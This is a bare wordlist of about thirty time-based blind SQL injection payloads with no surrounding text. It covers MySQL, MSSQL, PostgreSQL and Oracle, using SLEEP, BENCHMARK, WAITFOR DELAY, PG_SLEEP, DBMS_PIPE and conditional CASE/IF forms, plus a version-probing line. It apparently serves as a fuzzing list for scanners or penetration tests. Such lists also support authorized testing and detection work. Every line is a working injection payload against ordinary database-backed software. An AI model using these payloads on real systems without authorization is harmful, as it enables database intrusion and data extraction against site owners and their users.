' AND SLEEP(3)--
' AND SLEEP(3)#
" AND SLEEP(3)--
' OR SLEEP(3)--
' OR SLEEP(3)#
1 AND SLEEP(3)--
1' AND SLEEP(3)--
1') AND SLEEP(3)--
' AND (SELECT SLEEP(3))--
' AND BENCHMARK(5000000,SHA1('test'))--
' AND BENCHMARK(10000000,MD5('test'))--
'; WAITFOR DELAY '0:0:3'--
1; WAITFOR DELAY '0:0:3'--
1'; WAITFOR DELAY '0:0:3'--
') WAITFOR DELAY '0:0:3'--
'; SELECT PG_SLEEP(3)--
' AND PG_SLEEP(3)--
1; SELECT PG_SLEEP(3)--
' || PG_SLEEP(3)--
'; SELECT DBMS_PIPE.RECEIVE_MESSAGE(('a'),3) FROM DUAL--
' AND 1=(SELECT 1 FROM PG_SLEEP(3))--
' AND (SELECT * FROM (SELECT SLEEP(3))a)--
1 AND IF(1=1,SLEEP(3),0)--
' AND IF(1=1,SLEEP(3),0)--
' AND IF(SUBSTRING(@@version,1,1)='5',SLEEP(3),0)--
1 AND (SELECT CASE WHEN (1=1) THEN PG_SLEEP(3) ELSE PG_SLEEP(0) END)--
' AND (SELECT CASE WHEN (1=1) THEN PG_SLEEP(3) ELSE PG_SLEEP(0) END)--
' RLIKE SLEEP(3)--
' AND ELT(1=1,SLEEP(3))--
